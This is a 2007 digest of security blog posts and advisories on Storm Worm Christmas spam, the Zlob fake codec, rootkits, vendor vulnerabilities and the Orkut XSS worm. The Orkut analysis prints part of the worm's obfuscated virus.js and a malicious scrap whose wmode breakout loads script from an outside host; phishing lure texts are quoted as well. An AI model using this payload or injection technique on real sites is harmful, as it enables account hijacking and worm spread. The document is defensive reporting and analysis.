December 2007 - Posts

 

Is that really you, Santa?

Look, here comes Santa...on his sleigh with Rudolph the red-nosed reindeer and a computer. This year, he seems to have decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click on the links, you will find pictures of women dressed as "Mrs. Clause" on the site and the malicious file stripshow.exe, which is a new variant of Trojan.Peacomm.D, will be downloaded if you click on the picture.


Once it runs, you will be rewarded with malicious gifts for free!! As we have warned in the past, users are taking serious risks when being enticed by free stuff available on the Internet. Always keep your antivirus software up-to-date and follow safe computing practices.

Happy holidays!!

Posted by Shunichi Imano on December 23, 2007 08:48 PM

Source: Symantec Security Response Weblog: Is that really you, Santa?

 

It's a Stormy Christmas Eve..
Posted by Esz @ 08:54 GMT


So, we were wrong. It turns out that the Storm gang was going to do a Christmas Malware run after all, they just decided to start it surprisingly late - on Christmas eve itself!
There's been a series of spam messages redirecting traffic to malicious site merrychristmasdude.com. This site contains a new version of the Storm Worm. The IP address of the site changes every second. We also already detect it earlier as Email-Worm.Win32.Zhelatin.pd
Here are the Screen shots of the site:
stormxmas (133k image)
stormxmas2 (5k image)
Don't be naughty and go wandering to that domain. Please do not click on the "Download For Free Now" button as it will get you infected. Merry Christmas, y'all!

Source: It's a Stormy Christmas Eve.. - F-Secure Weblog : News from the Lab

 

Anticipated Storm-Bot Attack Begins

Published: 2007-12-24,
Last Updated: 2007-12-24 13:11:38 UTC
by Kevin Liston (Version: 3)

Overview and Blocking Information

Shortly after 0000 GMT 24-DEC-2007 reports came in indicating that the Storm Botnet was sending out another wave of attempts to enlist new members.  This version is a Christmas-themed stripshow directing victims to merrychristmasdude.com.

The message comes in with a number of subjects:

Subject: I love this Carol!
Subject: Santa Said, HO HO HO
Subject: Christmas Email
Subject: The Perfect Christmas
Subject: Find Some Christmas Tail
Subject: Time for a little Christmas Cheer

Updated subjects:
“Merry Christmas To All”
“Warm Up this Christmas”
“Mrs. Clause Is Out Tonight!”
“The Twelve Girls Of Christmas”
“Jingle Bells, Jingle Bells”
“Cold Winter Nights”

The body is something similar to:

do you have a min?



This Christmas, we want to show you something you will really enjoy. Forget all the stress for two min and feast your eyes on these. ;-)

http://merry christmasdude.com/

[the domain was interrupted for your protection]

Thanks Kevin for the initial report.

I recommend that you apply blocks on that domain (merrychristmasdude.com) for both outbound HTTP requests and incoming emails.

Under The Hood

The domain appears to be registered through nic.ru and hosted on a fast-flux network of at least 1000 nodes.  Like previous Storm waves, the binary changes approximately every 15 minutes; supposedly updating the peer-list used by the P2P network that the bot-net uses for command and control.

Russ has a nice and tidy analysis available at: http://holisticinfosec.blogspot.com/2007/12/storm-bot-stripshow-analysis.html

Speaking of Blogspot

If you google for merrychristmasdude.com you'll see a number of spam blogs set up with that domain in their body and directing traffic to siski.cn (take a look for that in your proxy logs while you're at it.)

Visiting skiski.cn will redirect you over to shockbabetv.com and attempt to install a fake video codec, which itself appears to be a downloader to deliver more coal to your stocking.


Kevin Liston (kliston -at- isc.sans.org)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

MS07-069 - Post install issue

Published: 2007-12-19,
Last Updated: 2007-12-21 05:09:23 UTC
by Stephen Hall (Version: 2)

We have been working with Microsoft and a couple of our readers on an issue they have been having with MS07-069 and IE crashing after the roll up patch for IE has been installed.

Well the Microsoft MSRC have updated their blog and there is a KB article which provides a workaround.

So if you have a customised installation and have been having IE issues since MS07-069, this could be your solution.

UPDATE

Microsoft has released an update to fix this problem.  You can find it here. (thanks Susan).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Google Toolbar Custom Button Installer Dialog Spoofing Weakness

Secunia Advisory:
SA28166

Release Date:
2007-12-21

Critical:

Less critical

Impact:
Spoofing

Where:
From remote

Solution Status:
Unpatched

Software:
Google Toolbar 1.x
Google Toolbar 2.x
Google Toolbar 3.x
Google Toolbar 4.x

 

Description:
Aviv Raffon has discovered a weakness in Google Toolbar, which can be exploited by malicious people to conduct spoofing attacks.

The weakness is caused due to an error when handling domains that are being displayed in the Custom Button Installer dialog. This can be exploited to spoof the origin of a custom button and the domain information in the "privacy considerations" section via a specially crafted xml file in combination with a redirector page.

The weakness is confirmed in Google Toolbar version 4.0.1601.4987 for Internet Explorer. Other versions may also be affected.

Solution:
Do not rely on information in the Custom Button dialog when installing custom buttons.

Provided and/or discovered by:
Aviv Raffon

Original Advisory:
http://aviv.raffon.net/2007/12/18/GoogleToolbarDialogSpoofingVulnerability.aspx

Source: Google Toolbar Custom Button Installer Dialog Spoofing Weakness - Advisories - Secunia

 

Comcast starts blocking email willy-nilly

Spam voting

A NEW feature on Comcast which blocks email identified as spam has been causing merry hell.

In the good old days if two people decide that an email from an outfit is spam, that email will go into the junk mailbox if it appears anywhere else.

Writing in his bog, one angry customer said that recently Comcast has upped the ante and will block all email from the offending server.

The punter works for a news site and says that Comcast users that have requested daily news emails from the site and are being denied email they have asked for.

He had tried to get Comcast to look at the problem, but the outfit did not seem particularly interested. Loyal readers of the news site who have complained that their news is not being delivered have also complained and been ritualistically ignored.

After much shouting Comcast has lifted the block on the IP range. But this seems to be a problem with several US ISPs. For example, one ISP in Florida and another in California are convinced that every email from Bulgaria must be spam and is refusing to receive mail with a .bg ending.

Ironically the same mail sent from yahoo.com gets through. µ

Source: Comcast starts blocking email willy-nilly - The INQUIRER

 

Is Trojan.Zlob Getting Honest? Naaahh...

New fake codec Web sites often appear out of nowhere (we are pretty used to seeing them) and in most cases if you download and run the "codec" you get infected with a variant of Trojan.Zlob. Nothing new, but this time I found something different. I was testing a fake codec Web site when I came upon a new variant. The installation step is the usual:


Figure 1: Standard installation process

However, after that the browser is started with a Google search for the word “sex.” The interesting stuff is that while browsing, you will now be frequently faced with this popup:


Figure 2: Frequently recurring message box

Well, I really appreciate the honesty of Zlob telling me I was infected! Clicking the OK button will force the download of “IE Defender,” which is an antispyware application. (IE Defender is also a potentially unwanted application. It is a wannabe malware scanner that is used in conjunction with the Zlob threat. You can find more details about IE Defender in the related write-up here.)

Of course, it’s not over yet. The Zlob also installs a browser helper object (BHO – a module for Internet Explorer, used to integrate added functionality) in order to show the previously mentioned popup during Web browsing. A quick analysis of the BHO revealed some other interesting features. It is capable of hijacking Google results and redirecting them to IE Defender Web site:


Figure 3: Google search reports a fake error box and a link to pornographic content

A fake error box is shown in the Google results, as well as a link to a pornographic video on YouTube. This is supposed to panic the user, because most users wouldn't want someone else using his or her computer for an innocent Google search and then find a link to pornographic content in the search results. (Incidentally, you might notice that the search word I used was "potato.”) Clicking the error box will bring the user to the IE Defender Web site.

If the annoying popup was not enough, surely an error message from Google will make you think twice about the potential dangers! We know very well how these threats can spoof legitimate Web sites or security products in order to convince a user to buy their own security applications. Google is not the only one being targeted. Further analysis reveals that Yahoo is also supposedly reporting the same behavior:


Figure 4: Yahoo search shows a fake error box

Not only do you see a fake error box in the search results, but also the first legitimate result is hijacked so that if it is clicked it will redirect the user to the IE Defender fake online scan Web site. Also, Live Search is not immune:


Figure 5: A legitimate search result in Live Search has been redirected

In this case there are no fake error boxes shown in the search results, but the first legitimate result entry is hijacked in order to point to the IE Defender Web site. In addition, the MySpace and MSN Web sites are targeted with the same technique.

Interestingly, if you decide to download IE Defender and run a scan, it will actually detect the Zlob infection. Of course you have to pay if you want to clean up the reported infection. So it looks like that Zlob is really kind: after infecting your system it will reveal that your system is infected. Then it tries to redirect you to a Web site where you can download antispyware software that is supposedly able to remove it (for only $38.95 USD). What a lovely Trojan! I didn't actually purchase the IE Defender software, because it would probably do more harm than good. I'd rather let my Symantec products (with the latest definitions, of course) take care of the antispyware work!

Posted by Andrea Lelli on December 21, 2007 05:00 AM

Source: Symantec Security Response Weblog: Is Trojan.Zlob Getting Honest? Naaahh...

 

Secunia Advisory:
SA28177

Release Date:
2007-12-20

Critical:

Less critical

Impact:
Manipulation of data

Where:
From remote

Solution Status:
Unpatched

Software:
HP Software Update 3.x

Description:
porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system.
The vulnerability is caused due to the HPRulesEngine.ContentCollection.1 ActiveX Control (RulesEngine.dll) including the insecure "SaveToFile()" method, which writes to a file specified as an argument. This can be exploited to overwrite and corrupt arbitrary files on the system in the context of the currently logged-on user.
The vulnerability is reported in version 3.0.8.4. Other versions may also be affected.
Solution:
Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by:
porkythepig
Original Advisory:
http://www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt

Source: HP Software Update ContentCollection Class ActiveX Control Insecure Method - Advisories - Secunia

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: December 20, 2007

********************************************************************

Summary

=======

The following bulletin has undergone a minor revision increment.

Please see the appropriate bulletin for more details.

* MS07-069 - Critical

Bulletin Information:

=====================

* MS07-069 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-069.mspx

- Reason for Revision: Bulletin revised to reflect a new Security Update FAQ entry for a known issue documented in KB946627.

- Originally posted: December 11, 2007

- Updated: December 20, 2007

- Bulletin Severity Rating: Critical

- Version: 1.3

 

Rootkits in China Part 1

Thursday December 20, 2007 at 9:52 am CST
Posted by Xing Su


The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

Source: Computer Security Research - McAfee Avert Labs Blog

 

Pinch Malware Authors Busted
Posted by Alexey @ 16:30 GMT


Nikolay Patrushev, head of the Russian FSB (Federal Security Agency), recently announced that over 1.4 million hacker attacks against federal sites were repelled in just 2007.
Patrushev also stated that the authors of the famous Pinch trojan (known as LdPinch, PdPinch) have been identified and are now awaiting trial. Pinch production has been done in a very professional manner with the authors creating easy-to-use tools to quickly get stolen information from infected computers.
The two malware authors are reported to be Russian citizens Ermishkin and Farhutdinov. According to some reports, Pinch-based malware has infected tens of millions of personal computers worldwide. The financial losses due to Pinch infections can hardly be calculated.

Pinch Parser

See Patrik's earlier post for more details on some of the tools used.

Source: Pinch Malware Authors Busted - F-Secure Weblog : News from the Lab

 

The Orkut Worm Has Landed!

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js", which was injected using an embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=k[c]||e(c)}
 k=[function(e){return d[e]}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(k[c]){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
 }
 }
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];
7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?";
m="+m.2f():"")+(c?";
c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);
6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?";
9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);
3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));
f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&
15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);
3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc
<br/>
[silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver]
<br/>
<embed src=http://www.orkut.com/LoL.aspx type=
"application/x-shockwave-flash" wmode="transparent');
script=document.createElement('script');
script.src='http://files.myopera111.com/[REMOVED].js';
document.getElementsByTagName('head')[0].appendChild
(script);escape('" width="1" height="1">
</embed>

When you look at the code there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:

wmode="transparent');

The author has closed wmode with '); and has added some script code in the attribute value itself. Let's analyze this further. We tested the script with a variant of the malicious scrap:

"<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">".

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript">
var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx',
   '337533968', '1', '1', '9', '#FFFFFF',
   'autohigh', '', '', '337533968');
flashWriter._addParam('wmode', 'transparent');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');
flashWriter._setAttribute('style', '');
flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:

flashWriter._addParam('wmode', 'transparent');
script = document.createElement('script');
script.src = 'http://files.myopera.com/virusd[REMOVED]';
document.getElementsByTagName('head')[0].appendChild(script);
escape('');
flashWriter._addParam('allowNetworking', 'internal');
flashWriter._addParam('allowScriptAccess', 'never');

Based on what we have seen so far we can infer that the Orkut application filters failed to parse this attribute in the request. It took the whole wmode value as is and added it in the rendering code:

flashWriter._addParam('wmode', 'transparent'); (malicious script)

In this way the worm inserts a malicious script using the embed tag and uses it for exploitation. Interestingly, a victim doesn’t need to click on the scrap. When the scrapbook is loaded the malicious embed flash code loads the virus.js file silently. The JavaScript takes the cookies and tokens of the logged in user and uses it to spread the worm further.

This worm illustrates how a simple script injection exploit could affect a large social networking site. Remember, users didn’t have to click anything as the malicious script runs silently as soon as the page is loaded. This worm could have been used for other malicious purposes, such as stealing cookies, exploiting other vulnerabilities, or stealing sensitive data as well.

As of today, the virus.js script is no longer available on the site and it seems as if there have been adequate checks implemented by Orkut to validate content when posting a scrap. The malicious scraps have also been deleted from the scrapbook of the infected users.

Symantec has built a number of excellent Web browsing protections into our 2008 product range.
The worm is detected by Symantec's antivirus products with certified definitions of 12/19/2007 rev. 7 and greater as JS.Woorkut. We recommend that you keep your Symantec products up-to-date, patch your systems, and run your browser with limited options enabled.

Posted by Umesh Wanve on December 20, 2007 08:30 AM

Source: Symantec Security Response Weblog: The Orkut Worm Has Landed!
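
The string-literal breakout described in the post above, as an added example that is not code from Symantec or Orkut: a vulnerable renderer that pastes the wmode value into generated JavaScript, beside a hardened one. The names renderVulnerable, renderHardened, jsString, run, marker and the sample value are hypothetical, and the sample input is constructed with a harmless marker call in place of the worm's script loader.

```javascript
// Added example. Models a server that turns a scrap's <embed wmode=...>
// attribute into a line of generated JavaScript, as the post describes.

// Constructed sample: same shape as the wmode value in the post, but the
// injected statement is a harmless marker() call.
const SAMPLE_WMODE = "transparent');marker('injected');escape('";

// Values accepted for wmode (assumption: a short allow-list is enough).
const ALLOWED_WMODE = new Set(['window', 'opaque', 'transparent']);

// Vulnerable: the value is pasted between single quotes as-is, so a "'"
// in the value ends the string literal and the remainder runs as code.
function renderVulnerable(wmode) {
  return "flashWriter._addParam('wmode', '" + wmode + "');";
}

// Encode any value as a JavaScript string literal that is also safe inside
// an inline <script> block (no literal <, >, & or line separators).
function jsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened: allow-list first, then emit the value through jsString so the
// output stays one statement even if the allow-list is later widened.
function renderHardened(wmode) {
  const value = ALLOWED_WMODE.has(wmode) ? wmode : 'window';
  return 'flashWriter._addParam("wmode", ' + jsString(value) + ');';
}

// Run a generated line against stub objects and record every call made.
// A safe rendering produces exactly one _addParam call and nothing else.
function run(generated) {
  const calls = [];
  const flashWriter = {
    _addParam: (key, value) => calls.push(['_addParam', key, value]),
  };
  const marker = (msg) => calls.push(['marker', msg]);
  const escapeStub = () => '';
  new Function('flashWriter', 'marker', 'escape', generated)(
    flashWriter, marker, escapeStub);
  return calls;
}

console.log(renderVulnerable(SAMPLE_WMODE));
console.log(run(renderVulnerable(SAMPLE_WMODE)));
console.log(renderHardened(SAMPLE_WMODE));
console.log(run(renderHardened(SAMPLE_WMODE)));
```

Encoding alone already keeps the value inside the literal; the allow-list additionally rejects anything that is not a real wmode setting.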

 

The darker side of online virus scanners

Aleks
December 20, 2007 | 15:47  GMT


Online antivirus services such as VirusTotal (www.virustotal.com) and VirusScan (http://virusscan.jotti.org) have been around for a few years now. Services like this mean that any user can scan a suspicious file for malicious code online. These services differ from the online scanners offered on antivirus vendor sites by scanning files with several antivirus products simultaneously. For instance, VirusTotal currently uses 32 antivirus products to check suspicious files!

But as so often happens, something that can be used for good – helping users check the integrity of their files – can also be used by virus writers. They quickly caught on to the fact that services like the ones mentioned above could be used to test how well their creations can evade popular antivirus solutions. If a new Trojan or worm can be detected by an antivirus, the author will deliberately modify it until it isn't detected any more. The result? The heuristics used in the vast majority of antivirus products are helpless when confronted by such carefully prepared malicious programs.

By default, VirusScan, VirusTotal and other services send all suspicious files to antivirus companies. If a file is detected by, say, 10 antivirus products, and the other 22 don't detect it, the file will be sent to the 22 relevant virus labs for analysis and to be added to the antivirus database. This significantly reduces the time taken by antivirus companies to react during epidemics and also increases the overall detection rate. If the user doesn't want a file to be sent to the antivirus company, then s/he has to disable this option when scanning the file.

However, there's a rumour in virus writing circles that all files are sent to virus labs, regardless of whether or not the option is enabled. Cyber criminals are now offering a solution for the tin-foil hat brigade – similar services designed expressly for virus writers. You have to pay to use the service, but there's a guarantee that no file will be sent to an antivirus company.

One example is AvCheck.ru. The creators of this site offer to scan files using 15 antivirus programs and 'guarantee privacy for you and your files'. Of course they want money for it – a dollar per file.


We can only admire the entrepreneurial spirit behind this site. But we're not going to wish them success. And after all, the site could be closed at any moment, and a court case could be raised against the creators of the site by the antivirus companies whose products are being used in clear violation of license agreements.

Source: Viruslist.com - Analyst's Diary

 

Cisco Firewall Services Module Denial of Service Vulnerability

Secunia Advisory:
SA28175

Release Date:
2007-12-20

Critical:

Moderately critical

Impact:
DoS

Where:
From remote

Solution Status:
Vendor Workaround

Software:
Cisco Firewall Services Module (FWSM) 3.x

CVE reference:
CVE-2007-5584 (Secunia mirror)

Description:
A vulnerability has been reported in the Cisco Firewall Services Module (FWSM), which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the processing of data in the control-plane path with Layer 7 Application Inspections. This can be exploited to cause a crash and reload the FWSM via specially crafted network traffic.

The vulnerability is reported in FWSM System Software version 3.2(3).

Solution:
Update to FWSM software version 3.2(4) (available approximately 2007-12-31).

Apply vendor workaround (see vendor advisory for details).

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml

Source: Cisco Firewall Services Module Denial of Service Vulnerability - Advisories - Secunia

 

Orkut XSS Worm

Published: 2007-12-19,
Last Updated: 2007-12-19 17:57:39 UTC
by Tom Liston (Version: 1)

A vulnerability in the social networking site Orkut that allowed users to inject HTML and JavaScript into their profiles set the stage for a persistent XSS worm that appears to have affected approximately 400,000 Orkut users.  The malicious code is apparently fetched from the site "http://files.myopera.com" and is called, conveniently enough, "virus.js."


Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
